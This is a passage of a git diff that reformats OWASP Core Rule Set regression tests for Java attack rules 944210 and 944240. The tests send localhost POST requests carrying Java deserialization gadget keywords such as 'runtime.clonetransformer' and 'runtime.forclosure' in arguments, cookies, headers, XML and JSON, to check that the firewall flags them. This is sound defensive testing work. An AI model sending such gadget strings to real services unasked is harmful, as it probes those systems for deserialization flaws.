dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - Cs7QAF - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-51 + Cs7QAF + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 51 desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; 
name="payload"
- Content-Type: application/xml
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/xml
- Cs7QAF
- -----------------------------thisissparta--
- output:
- log_contains: "id \"944210\""
+ Cs7QAF
+ -----------------------------thisissparta--
+ output:
+ log:
+ expect_ids: [944210]
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml
index 17b6ea658..7d5a2ef38 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml
@@ -1,1791 +1,1789 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944240.yaml" - description: "Positive tests for rule 944240" +rule_id: 944240 tests: - - test_title: 944240-1 + - test_id: 1 desc: "Argument test includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log: + expect_ids: [944240] + - test_id: 2 desc: "Argument name includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.clonetransformer=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.clonetransformer=test" + output: + log: + expect_ids: [944240] + - test_id: 3 desc: "Cookie test includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 4 desc: "Cookie name includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.clonetransformer=test - method: 
"POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.clonetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 5 desc: "Request header test includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 6 desc: "XML attribute value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 7 desc: "XML element value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log: + expect_ids: [944240] + - test_id: 8 desc: "Nested XML element value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 
80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log: + expect_ids: [944240] + - test_id: 9 desc: "Content-Type text/plain includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log: + expect_ids: [944240] + - test_id: 10 desc: "Content-Type 
application/json arg value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.clonetransformer\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.clonetransformer\"}" + output: + log: + expect_ids: [944240] + - test_id: 11 desc: "Content-Type application/json arg name includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.clonetransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.clonetransformer\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 12 desc: "Argument test includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log: + expect_ids: [944240] + - test_id: 13 desc: "Argument name includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.forclosure=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.forclosure=test" + output: + log: + expect_ids: [944240] + - test_id: 14 desc: "Cookie test includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 15 desc: "Cookie name includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.forclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.forclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 16 desc: "Request header test includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 17 desc: "XML attribute value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 18 desc: "XML element value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log: + expect_ids: [944240] + - test_id: 19 desc: "Nested XML element value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log: + expect_ids: [944240] + - test_id: 20 desc: "Content-Type text/plain includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log: + expect_ids: [944240] + - test_id: 21 desc: "Content-Type application/json arg value includes keyword 
runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.forclosure\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.forclosure\"}" + output: + log: + expect_ids: [944240] + - test_id: 22 desc: "Content-Type application/json arg name includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.forclosure\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: 
"HTTP/1.0" + data: "{\"runtime.forclosure\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 23 desc: "Argument test includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log: + expect_ids: [944240] + - test_id: 24 desc: "Argument name includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatefactory=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatefactory=test" + output: + log: + expect_ids: [944240] + - test_id: 25 desc: "Cookie test includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + 